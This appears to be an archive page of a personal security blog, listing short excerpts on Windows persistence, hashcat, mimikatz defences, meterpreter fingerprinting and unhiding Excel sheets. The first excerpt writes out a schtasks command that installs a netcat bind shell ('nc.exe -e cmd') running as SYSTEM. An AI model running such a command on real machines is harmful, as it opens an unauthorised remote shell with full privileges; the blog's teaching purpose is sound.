by frank | Aug 17, 2020 | Security, Windows
Reading Time: < 1 minuteA classic way to achieve this is via Scheduled Task Copy netcat to c:\temp (for example) schtasks /create /RU SYSTEM /SC weekly /D Sat /TN SysMe /TR “c:\temp\nc.exe -e cmd -l -p 666” /ST 10:00:00 and then run it with Schtasks...
by frank | Jul 9, 2020 | Blue Team, Malware, Security
Reading Time: 5 minutesThis is the 3rd article in this serie. (here is part1 & part2) A little adon to Part 1 & 2, as part of my job is to implement Palo Alto Networks Firewalls, I took the task to work with PaloAltoNetworks for them to create a signature to...
by frank | Jul 3, 2020 | Pwn, Red team, Security
Reading Time: < 1 minutehttps://hashcat.net/hashcat/ and https://github.com/hashcat It’s a tool that let’s you bruteforce hashes. Hashcat 6.0 is the latest version and support around 208 different hash types ! You can use the CPU or the GPU to compute...
by frank | Jul 1, 2020 | Blue Team, Red team, Security, Windows
Reading Time: < 1 minuteas written in this blogpost mimikatz is an amazing tool to read password from a Window machine (either LSASS process, or Registry keys and other means). How can we defend against it ? Run LSASS process as “RunAsPPL”...
by frank | Jun 8, 2020 | Blue Team, Security
Reading Time: < 1 minuteI stumbled on an article from . In his description he has reliazed that the meterpreter return “It works” return one byte short the standard message. The original sha256 of the index.html is :...
by frank | Apr 28, 2020 | Blue Team, Security
Reading Time: < 1 minuteLittle trick a great colleague showed me to unhide a sheet in Excel : In powershell $objExcel = New-Object -ComObject Excel.Application $objExcel.Visible = $true $WorkBook = $objExcel.Workbooks.Open(“C:\Temp\hiddensheet.xls”)...
Recent Comments